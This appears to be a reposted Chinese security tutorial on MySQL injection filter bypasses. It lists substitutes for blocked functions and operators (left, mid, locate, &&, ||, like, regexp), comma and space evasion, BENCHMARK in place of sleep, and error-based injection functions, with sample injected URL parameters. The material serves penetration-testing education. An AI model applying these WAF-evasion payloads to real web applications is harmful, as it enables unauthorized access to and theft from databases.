高质量的安全文章,安全offer面试经验分享
尽在 # 掌控安全EDU #
一、字符串截取函数
平时我们进行盲注时用substr()函数截取字符串,当substr()被过滤时,怎么办呢?我们可以用这些函数可以达到同样的效果
1.left(str, length)
用法:left(str, length),即:left(被截取字符串, 截取长度)
SELECT LEFT('www.baidu.com',8)结果为:www.baid
2.right(str,length)
从右边第length位开始截取字符串
用法:right(str, length),即:left(被截取字符串, 截取长度)SELECT RIGHT('www.baidu.com',8)
结果为:aidu.com
3.substring(str,index,len)
截取特定长度的字符串
用法:
substring(str, pos),即:substring(被截取字符串,从第几位开始截取)
substring(str, pos, length),即:substring(被截取字符串,从第几位开始截取,截取长度)
(1).从字符串的第8个字符开始读取直至结束
SELECT SUBSTRING('www.baidu.com',8)
结果为:du.com
(2).从字符串的第8个字符开始,只取3个字符
SELECT SUBSTRING('www.baidu.com',8,3)
结果为:du.
4.mid(str,start,length)
截取str 从start开始,截取length的长度
mid()的用法等同于substr()这里就不多赘述了
5.substring_index(str, delim, count)
按关键字进行读取
用法:substring_index(str, delim, count),即:substring_index(被截取字符串,关键字,关键字出现的次数)
(1).截取第二个“.”之前的所有字符
SELECT SUBSTRING_INDEX('www.baidu.com', '.', 2);
结果:www.baidu
(2).截取倒数第二个“.”之后的所有字符
SELECT SUBSTRING_INDEX('www.baidu.com', '.', -2);
结果:baidu.com
3.如果关键字不存在,则返回整个字符串SELECT SUBSTRING_INDEX('www.baidu.com', 'zkaq', 1);
结果: www.baidu.com
substring_index()可以在布尔盲注时使用,先随便截取一个不可能的值。那么页面肯定返回正常,如:and substring_index(database(),'qwasda',1)=database()'
6.Locate(substr,str)
返回字符串的位置
用法1:
LOCATE(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置SELECT locate("d",'www.baidu.com');
结果:8
用法2:
LOCATE(substr,str,pos)返回字符串substr中第一次出现str的位置,从第pos个位置开始
例:从字符串”pan.baidu.com”的第三位开始计算,返回字符“a”第一次出现的位置SELECT locate("a",'pan.baidu.com',3);
结果:6
locate()还可以判断字符串长度select locate('m','m123456m',15);
7.instr (substr,str)
返回字符串的位置等同于locate(),但语法相反
用法:instr(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置SELECT instr('www.baidu.com',"d");
结果:8
8.position (substr IN str)
position (substr IN str)的效果与instr(),locate()相同,但语法不同
用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置SELECT position("d"in'www.baidu.com');
结果:8
9.strcmp()
若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回1
用法:
mysql> SELECT STRCMP(12345,123456);
-> -1
mysql> SELECT STRCMP(1234567,123456);
-> 1
mysql> SELECT STRCMP(123456,123456);
-> 0二、替代逻辑运算符
我们在注入时,用的最多的是什么?在测试是否有注入点时,经常会用到and 1=1, 如果and、等于号”=”等这些逻辑运算符被过滤无法使用时,我们是不是就此放弃了,这时候我们可以用一些特殊的符号替代
1.替代and
当and被过滤时,可以用”&&”替代
Index.php?id = 1 and 1=1等同于Index.php?id = 1 && 1=1
2.替代or
当or被过滤时,可以用”||”替代
Index.php?id = 1.1 or 1=1等同于Index.php?id = 1.1 || 1=1
3.替代异或运算符”^”
当异或运算符”^”被过滤时,可以用”XOR”替代
select 1=1 XOR 1=1等同于select 1=1 ^ 1=1
4.替代等于号”=”
等于号”=”被过滤时,可以用多种方法替代
(1) Between://在什么与什么之间
select database() between 0x61 and 0x7a;
(2) in:// mysql中in常用于where表达式中,其作用是查询某个范围内的数据
SELECT * FROM user WHERE uid IN (2,3,5)
(3) Like //模糊查询,也可以当等于号用
Index.php?id = 1.1 or 1 like 1等同于Index.php?id = 1.1 or1 like 1
(4) 使用正则代替等于号
SELECT ‘Hern’ REGEXP ‘[0-9]’;
Rlike === regexp
REGEXP等同于RLIKE
5.替代逗号”,”
union select 1,2,3 => union select * from (select 1)a join (select 2)b join (select 3)c;
6.替代空格
%20 %09 %0a %0b %0c %0d %a0 /**/ tab/
%a0 这个不会被php的s进行匹配
/*!/ 内敛注释
# 这个也可以用来做分隔 挺有意思
7.替代NULL
N => null
select *from duomi_admin where id=N
三、其他小技巧
1.替代sleep()
BENCHMARK(100000,SHA1(‘1’)), 1
BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果
2.函数名和括号之间可以加入特殊字符
concat/**/()`version`()
3.花式报错注入
Floor()
Updatexml() //5.1.5以上才能使用
Extractvalue() //5.1.5以上才能使用
Exp() //5.5.5后可以用
Name_const
geometrycollection(),multipoint(),Polygon(),multipolygon(),linestring(),multilinestring() 几何函数报错
4.替代ascii
Hex()
Bin()
Ord()
回顾往期内容
一次从注入拿到系统权限+内网渗透
面试经验分享 — 安恒、安垚、端御#附面试题、心得
新时代的渗透思路!微服务下的信息搜集
反杀黑客 — 还敢连shell吗?蚁剑RCE第二回合~
防溯源防水表—APT渗透攻击红队行动保障
扫码加助教老师
可领取免费的安全教程
还有免费的配套靶场、交流群哦!
点击在看~好文推荐大家一起看!👇
原文始发于微信公众号(掌控安全EDU):当注入函数被过滤时的Mysql注入小技巧
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论